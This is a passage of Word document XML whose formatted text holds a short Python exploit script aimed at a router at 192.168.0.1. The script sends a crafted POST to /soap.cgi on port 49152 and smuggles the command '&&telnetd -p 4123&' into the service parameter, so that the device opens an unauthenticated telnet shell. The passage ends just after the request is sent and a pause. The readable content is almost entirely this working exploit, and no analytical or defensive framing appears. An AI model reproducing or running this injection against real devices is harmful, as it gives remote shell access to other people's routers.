        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A71D5D"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A71D5D"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77605F6E" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A71D5D"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A71D5D"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739E4F0" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A71D5D"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A71D5D"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1310AD46" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D400FE" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">request = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>b"POST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>soap.cgi?service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=&amp;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>telnetd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 4123&amp; HTTP/1.1\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36CA58" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">request += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>b"Host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>: localhost:49152\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD630A" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">request += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>b"Content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-Type: text/xml\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD7C02" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">request += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>b"Content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-Length: 88\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B187D" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">request += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>b"SOAPAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>s#b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>\r\n\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087635B" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">s = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>AF_INET, SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB5BC5" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>gethostbyname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"192.168.0.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>49152</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC79E0" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC3522" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF1A03" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
